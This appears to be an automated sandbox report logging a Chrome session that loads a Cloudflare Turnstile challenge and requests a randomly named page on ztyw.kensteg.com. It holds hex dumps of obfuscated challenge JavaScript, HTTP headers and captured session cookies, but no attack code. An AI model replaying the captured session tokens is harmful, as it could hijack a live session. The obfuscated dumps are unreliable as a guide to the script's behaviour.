                                                                    2024-05-24 03:02:01 UTC1369INData Raw: 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69
                                                                    Data Ascii: t: 0; width: 90px; text-align: center;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .si


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.1649725104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:02 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=888a0b630ed98c1b HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:02 UTC331INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:02 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 437089
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b67eb400caa-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:02 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 4a 2c 66 4b 2c 67 61 2c 67 62 2c 67 69 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c 68 68 2c 68 74 2c 68 47 2c 68 4c 2c 68 4d 2c 68 4e 2c
                                                                    Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fJ,fK,ga,gb,gi,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,hh,ht,hG,hL,hM,hN,
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 42 6a 6f 6e 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 53 69 67 44 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 79 42 77 47 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 55 48 76 49 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 49 4a 6b 65 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 75 41 42 4a 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 49 46 77 56 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 63 51 48
                                                                    Data Ascii: urn h===i},'Bjonf':function(h,i){return h>i},'SigDT':function(h,i){return h<i},'yBwGS':function(h,i){return i|h},'UHvIf':function(h,i){return h<<i},'IJkeF':function(h,i){return h&i},'uABJd':function(h,i){return h(i)},'IFwVs':function(h,i){return h<i},'cQH
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 65 74 75 72 6e 20 6a 5e 6b 7d 7d 2c 6a 61 28 31 36 30 36 29 21 3d 3d 6a 61 28 31 36 30 36 29 29 6c 3d 69 5b 6a 61 28 31 36 38 31 29 5d 2c 69 5b 6a 61 28 37 34 32 29 5d 28 67 29 3d 3d 3d 31 26 26 28 6c 3d 6a 61 28 32 38 37 30 29 29 2c 68 28 6c 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 6a 63 29 7b 6a 63 3d 6a 61 2c 6e 5b 6a 63 28 32 32 30 38 29 5d 2b 3d 69 5b 6a 63 28 32 32 39 37 29 5d 28 6a 63 28 31 35 37 37 29 2c 69 5b 6a 63 28 31 38 36 39 29 5d 28 6c 2c 6c 29 29 2b 6a 63 28 31 36 31 33 29 7d 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 64 5b 6a 61 28 31 34 37 32 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6b 2c 6a 66 2c 6c 2c 6e 2c 6f 2c 73 29 7b 69 66 28 6a 66 3d 6a 61 2c 6c 3d 7b 27 4d 4b 53 76 63 27 3a 66 75 6e
                                                                    Data Ascii: eturn j^k}},ja(1606)!==ja(1606))l=i[ja(1681)],i[ja(742)](g)===1&&(l=ja(2870)),h(l,function(n,jc){jc=ja,n[jc(2208)]+=i[jc(2297)](jc(1577),i[jc(1869)](l,l))+jc(1613)});else return d[ja(1472)](null,h)?'':f.g(h,6,function(k,jf,l,n,o,s){if(jf=ja,l={'MKSvc':fun
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 28 32 38 35 37 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 6a 67 28 33 33 36 39 29 5d 28 64 5b 6a 67 28 31 35 33 39 29 5d 28 48 2c 31 29 2c 64 5b 6a 67 28 31 37 33 35 29 5d 28 4d 2c 31 29 29 2c 64 5b 6a 67 28 31 34 37 32 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 6a 67 28 31 31 31 33 29 5d 28 64 5b 6a 67 28 31 35 38 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 6a 67 28 31 37 35 37 29 5d 28 73 2c 46 29 3b 48 3d 48 3c 3c 31 2e 34 35 7c 4d 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 6a 67 28 31 31 31 33 29 5d 28 64 5b 6a 67 28 31 35 38 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 67 28
                                                                    Data Ascii: (2857)](8,s);H=d[jg(3369)](d[jg(1539)](H,1),d[jg(1735)](M,1)),d[jg(1472)](I,j-1)?(I=0,G[jg(1113)](d[jg(1585)](o,H)),H=0):I++,M>>=1,s++);}}else{for(M=1,s=0;d[jg(1757)](s,F);H=H<<1.45|M,j-1==I?(I=0,G[jg(1113)](d[jg(1585)](o,H)),H=0):I++,M=0,s++);for(M=C[jg(
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 6a 67 28 32 35 38 32 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 20 72 65 74 75 72 6e 21 31 3b 44 2d 2d 2c 64 5b 6a 67 28 33 32 37 34 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 6a 67 28 33 34 31 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 6a 67 28 36 31 38 29 5d 28 48 3c 3c 31 2e 33 38 2c 64 5b 6a 67 28 31 33 39 39 29 5d 28 4d 2c 31 29 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 67 28 31 31 31 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 44 3d 3d 30 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 64 5b 6a
                                                                    Data Ascii: jg(2582)](o,H)),H=0):I++,M>>=1,s++);}else return!1;D--,d[jg(3274)](0,D)&&(D=Math[jg(3418)](2,F),F++),delete B[C]}else for(M=x[C],s=0;s<F;H=d[jg(618)](H<<1.38,d[jg(1399)](M,1)),I==j-1?(I=0,G[jg(1113)](o(H)),H=0):I++,M>>=1,s++);D--,D==0&&F++}for(M=2,s=0;d[j
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 4b 3d 6f 2c 4a 3d 64 5b 6a 6a 28 32 35 38 32 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 6a 6a 28 33 31 37 32 29 5d 28 30 3c 4f 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 50 3d 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 6a 6a 28 33 34 31 38 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 64 5b 6a 6a 28 32 33 33 31 29 5d 28 49 2c 4e 29 3b 4f 3d 64 5b 6a 6a 28 31 37 33 35 29 5d 28 4a 2c 4b 29 2c 4b 3e 3e 3d 31 2c 64 5b 6a 6a 28 31 38 34 37 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 6a 6a 28 31 34 30 33 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 6a 6a 28 39 36 34 29 5d 28 30 3c 4f 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 65 28 4d 29 2c 50 3d 64 5b 6a 6a 28 32 39 33 38 29
                                                                    Data Ascii: K=o,J=d[jj(2582)](s,L++)),M|=d[jj(3172)](0<O?1:0,I),I<<=1);switch(P=M){case 0:for(M=0,N=Math[jj(3418)](2,8),I=1;d[jj(2331)](I,N);O=d[jj(1735)](J,K),K>>=1,d[jj(1847)](0,K)&&(K=o,J=d[jj(1403)](s,L++)),M|=d[jj(964)](0<O?1:0,I),I<<=1);C[E++]=e(M),P=d[jj(2938)
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 5b 6a 77 28 31 32 33 32 29 5d 28 32 2c 66 29 2c 33 32 29 2c 66 46 5b 6a 77 28 36 35 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6a 78 29 7b 6a 78 3d 6a 77 2c 66 46 5b 6a 78 28 32 32 35 30 29 5d 26 26 28 66 46 5b 6a 78 28 31 31 38 31 29 5d 5b 6a 78 28 31 31 35 39 29 5d 28 29 2c 66 46 5b 6a 78 28 31 31 38 31 29 5d 5b 6a 78 28 31 34 37 38 29 5d 28 29 2c 66 46 5b 6a 78 28 32 30 33 36 29 5d 3d 21 21 5b 5d 2c 66 46 5b 65 5b 6a 78 28 31 32 31 36 29 5d 5d 5b 6a 78 28 32 34 31 37 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 6a 78 28 33 33 30 37 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 66 46 5b 6a 78 28 33 30 33 37 29 5d 5b 6a 78 28 31 34 33 37 29 5d 2c 27 65 76 65 6e 74 27 3a 6a 78 28 32 35 32 36 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 46 5b 6a 78 28 33 30 33 37 29
                                                                    Data Ascii: [jw(1232)](2,f),32),fF[jw(654)](function(jx){jx=jw,fF[jx(2250)]&&(fF[jx(1181)][jx(1159)](),fF[jx(1181)][jx(1478)](),fF[jx(2036)]=!![],fF[e[jx(1216)]][jx(2417)]({'source':e[jx(3307)],'widgetId':fF[jx(3037)][jx(1437)],'event':jx(2526),'cfChlOut':fF[jx(3037)
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 37 29 5d 29 2b 31 2c 6a 79 28 38 36 34 29 29 2c 66 46 5b 6a 79 28 33 30 33 37 29 5d 5b 6a 79 28 31 39 35 32 29 5d 29 2b 27 2f 27 2b 66 46 5b 6a 79 28 33 30 33 37 29 5d 5b 6a 79 28 31 34 36 36 29 5d 2b 27 2f 27 2c 66 46 5b 6a 79 28 33 30 33 37 29 5d 5b 6a 79 28 33 33 31 30 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 6d 5b 6a 79 28 32 34 32 36 29 5d 28 6a 5b 6a 79 28 32 39 31 37 29 5d 28 27 76 5f 27 2b 66 46 5b 6a 79 28 33 30 33 37 29 5d 5b 6a 79 28 31 39 35 32 29 5d 2b 27 3d 27 2c 43 29 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 63 61 74 63 68 28 45 29 7b 7d 7d 2c 66 46 5b 69 7a 28 32 37 34 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 65 2c 66 2c 67 2c 6a 7a 2c 68 2c 69 2c 6a 2c 6b 29 7b 28 6a 7a 3d 69 7a 2c 68 3d 7b
                                                                    Data Ascii: 7)])+1,jy(864)),fF[jy(3037)][jy(1952)])+'/'+fF[jy(3037)][jy(1466)]+'/',fF[jy(3037)][jy(3310)]);continue;case'12':m[jy(2426)](j[jy(2917)]('v_'+fF[jy(3037)][jy(1952)]+'=',C));continue}break}}catch(E){}},fF[iz(2746)]=function(c,d,e,f,g,jz,h,i,j,k){(jz=iz,h={
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 33 39 33 29 2c 67 6b 5b 69 7a 28 32 39 34 31 29 5d 3d 69 7a 28 31 30 38 33 29 2c 67 6b 5b 69 7a 28 32 34 36 37 29 5d 3d 69 7a 28 34 37 30 29 2c 67 6b 5b 69 7a 28 31 35 31 30 29 5d 3d 69 7a 28 35 35 36 29 2c 67 6b 5b 69 7a 28 33 30 38 38 29 5d 3d 69 7a 28 38 34 39 29 2c 67 6b 5b 69 7a 28 31 39 35 31 29 5d 3d 69 7a 28 32 36 34 37 29 2c 67 6b 5b 69 7a 28 35 32 32 29 5d 3d 69 7a 28 32 39 37 34 29 2c 67 6b 5b 69 7a 28 31 36 39 32 29 5d 3d 69 7a 28 32 32 33 33 29 2c 67 6b 5b 69 7a 28 37 31 34 29 5d 3d 69 7a 28 38 32 30 29 2c 67 6b 5b 69 7a 28 32 32 34 35 29 5d 3d 69 7a 28 37 33 38 29 2c 67 6b 5b 69 7a 28 32 31 38 33 29 5d 3d 69 7a 28 31 39 31 38 29 2c 67 6b 5b 69 7a 28 31 32 31 38 29 5d 3d 69 7a 28 32 34 36 39 29 2c 67 6b 5b 69 7a 28 31 34 34 38 29 5d 3d 69 7a
                                                                    Data Ascii: 393),gk[iz(2941)]=iz(1083),gk[iz(2467)]=iz(470),gk[iz(1510)]=iz(556),gk[iz(3088)]=iz(849),gk[iz(1951)]=iz(2647),gk[iz(522)]=iz(2974),gk[iz(1692)]=iz(2233),gk[iz(714)]=iz(820),gk[iz(2245)]=iz(738),gk[iz(2183)]=iz(1918),gk[iz(1218)]=iz(2469),gk[iz(1448)]=iz
                                                                    2024-05-24 03:02:02 UTC1369INData Raw: 31 30 30 29 2c 67 6d 5b 69 7a 28 31 36 34 38 29 5d 3d 69 7a 28 32 39 37 30 29 2c 67 6d 5b 69 7a 28 32 31 33 32 29 5d 3d 69 7a 28 32 36 36 38 29 2c 67 6d 5b 69 7a 28 31 32 36 35 29 5d 3d 69 7a 28 37 30 33 29 2c 67 6d 5b 69 7a 28 32 31 39 34 29 5d 3d 69 7a 28 31 33 35 34 29 2c 67 6d 5b 69 7a 28 33 31 33 39 29 5d 3d 69 7a 28 32 31 35 31 29 2c 67 6d 5b 69 7a 28 31 31 38 33 29 5d 3d 69 7a 28 32 37 36 37 29 2c 67 6d 5b 69 7a 28 31 32 36 37 29 5d 3d 69 7a 28 33 32 34 38 29 2c 67 6d 5b 69 7a 28 32 30 38 32 29 5d 3d 69 7a 28 32 34 34 39 29 2c 67 6d 5b 69 7a 28 33 30 39 38 29 5d 3d 69 7a 28 35 33 39 29 2c 67 6d 5b 69 7a 28 33 32 38 34 29 5d 3d 69 7a 28 31 34 34 31 29 2c 67 6d 5b 69 7a 28 31 37 31 33 29 5d 3d 69 7a 28 32 37 33 31 29 2c 67 6d 5b 69 7a 28 31 30 38 36
                                                                    Data Ascii: 100),gm[iz(1648)]=iz(2970),gm[iz(2132)]=iz(2668),gm[iz(1265)]=iz(703),gm[iz(2194)]=iz(1354),gm[iz(3139)]=iz(2151),gm[iz(1183)]=iz(2767),gm[iz(1267)]=iz(3248),gm[iz(2082)]=iz(2449),gm[iz(3098)]=iz(539),gm[iz(3284)]=iz(1441),gm[iz(1713)]=iz(2731),gm[iz(1086


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.1649726104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:02 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:02 UTC240INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:02 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    cache-control: max-age=2629800, public
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b68ceb97298-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.1649719172.67.153.1784432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:02 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                                    Host: ztyw.kensteg.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://ztyw.kensteg.com/82jPIO/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: XSRF-TOKEN=eyJpdiI6IndYK0tuT3hZQzVTYk5CRFZWNDl3dmc9PSIsInZhbHVlIjoiaHcyTGRvVmpoQ0FtVUhDelVXaGUxWUZCbDFlc1NabXZxTi9ueHBuT3lTOVd6ekZWbUR3c2doQ0NHMFN4WkxjMnNZVUJCVjd4N21XdW1DbDR1LzlJR2Qvdm01TThzVGlyMHErZVAzSGFPQkJkbE8zT08yL0VWdktGNzlab2dsMm8iLCJtYWMiOiJhYzEyNjhiNjNhYTk4NDg1NGEyNGY4NmYyZWEwN2E5NjYzOGM0MWViYWFiYTAzYjRkMzI4ZDcwY2Y2NjViYWExIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5ZbW5NaE9hb3gyS0RETUUrYWhYSVE9PSIsInZhbHVlIjoiUkRWZlhMVy83RUFyYUhMVjQ1dGVtSndPZ3FVVG11MThXS2RUb1Z0Q0xjMUkzVHBPV3Z5Y0RPN0tiYk0yajZSbC84RnpKNFVKZDhtbEsvbDg2ekJXV01ROEpHTHRmVStLdnpUZDF5WlNWQlE0Nldzd3Nkb1U2M3BMUmpxZUNzY2oiLCJtYWMiOiIwNjg2M2YwYTBiMGNlNTNjNWU5MDU2ZjJhMzY0Njc0MGUwNDdmYjJjZDg0OWRiM2IxNTc0MWFiMjg0OWU1ZTBlIiwidGFnIjoiIn0%3D
                                                                    2024-05-24 03:02:03 UTC641INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 24 May 2024 03:02:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: max-age=14400
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2gwpimc%2Br6phS3zMmiPRXXd1zlhEaJyTFIta4sffFZTO2%2FucZQfsyOiLTVAj%2FbjfUOzyAy5LmBY1GB14dsFOApWm6tIzoHLmhlmQwERwuI7YrCT1%2BJOhgB7c1PYvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 6457
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b6c7b584301-EWR
                                                                    2024-05-24 03:02:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.1649727104.17.3.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:03 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:03 UTC240INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:03 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    cache-control: max-age=2629800, public
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b6df9cd8c1d-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.1649729104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:03 UTC915OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ec HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 2695
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    Content-type: application/x-www-form-urlencoded
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    CF-Challenge: 0cc0942b0c543ec
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Origin: https://challenges.cloudflare.com
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
